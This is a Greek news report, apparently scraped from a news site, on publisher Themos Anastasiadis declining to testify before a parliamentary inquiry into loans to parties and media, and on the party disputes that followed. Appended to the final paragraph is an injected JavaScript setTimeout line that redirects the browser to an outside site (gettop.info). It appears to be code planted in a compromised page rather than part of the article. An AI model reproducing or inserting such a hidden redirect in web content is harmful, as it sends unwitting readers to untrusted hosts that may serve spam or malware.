Ο Αναστασιάδης αρνήθηκε να καταθέσει στην Εξεταστική για τα δάνεια στα ΜΜΕ

0
10

 

 Έντονες αντιδράσεις στην Εξεταστική Επιτροπή της Βουλής που διερευνά τα δάνεια στα κόμματα και τα ΜΜΕ, προκάλεσε η άρνηση του εκδότη της εφημερίδας Πρώτο Θέμα, Θέμου Αναστασιάδη να παρευρεθεί και να καταθέσει ισχυριζόμενος ότι βρίσκεται στο εξωτερικό και δεν γνωρίζει πότε θα επιστρέψει.

Αναλυτικότερα, τις προθέσεις του κ. Αναστασιάδη εξέφρασε μέσω τηλεφωνικής επικοινωνίας αλλά και επιστολής που απέστειλε στην Εξεταστική Επιτροπή ο γενικός διευθυντής του Πρώτου Θέματος, Μπάμπης Κούτρας, ο οποίος ανέφερε ότι ο εκδότης βρίσκεται «για προσωπικούς λόγους» στο εξωτερικό και δεν γνωρίζει πότε θα επιστρέψει. Ο κ. Κούτρας αντιπρότεινε μάλιστα να καταθέσει ο ίδιος αντί για τον κ. Αναστασιάδη.

Οι βουλευτές της ΝΔ, του ΠΑΣΟΚ και του Ποταμιού αποδέχθηκαν την πρόταση του Πρώτου Θέματος λέγοντας ότι δεν είναι αναγκαίο να προσέλθει ο ίδιος ο κ. Αναστασιάδης, ενώ υποστήριξαν ό,τι πληροφορίες για τα δάνεια του Πρώτου Θέματος μπορεί να καταθέσει και ο Μπάμπης Κούτρας.

Όμως έντονα αντέδρασαν οι βουλευτές του ΣΥΡΙΖΑ,των ΑΝΕΛ και της Ένωσης Κεντρώων. Μάλιστα, έκαναν λόγο για πρωτοφανή και προσβλητική ενέργεια προς την Εξεταστική. Ο Πρόεδρος της Εξεταστικής Επιτροπής, Σωκράτης Φάμελλος, αποκάλυψε μάλιστα ότι ο κ. Αναστασιάδης γνώριζε την κλήση από τον Ιούλιο.

Η βουλευτής του ΣΥΡΙΖΑ, Αννέτα Καββαδία ανέφερε ότι «πρόκειται για προσβολή» προς την Επιτροπή,ενώ χαρακτήρισε «αλαζονικό» το ύφος του εκδότη του Πρώτου Θέματος. Ο βουλευτής των Ανεξάρτητων Ελλήνων Δημήτρης Καμμένος κάλεσε το Προεδρείο της Εξεταστικής να διακριβώσει αν ο κ. Αναστασιάδης βρίσκεται πράγματι στο εξωτερικό.

Τελικά αποφασίστηκε να αποστείλουν στον Θέμο Αναστασιάδη νέα επιστολή, καλώντας τον να καταθέσει την ερχόμενη εβδομάδα και μάλιστα όποια ημέρα τον εξυπηρετεί. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here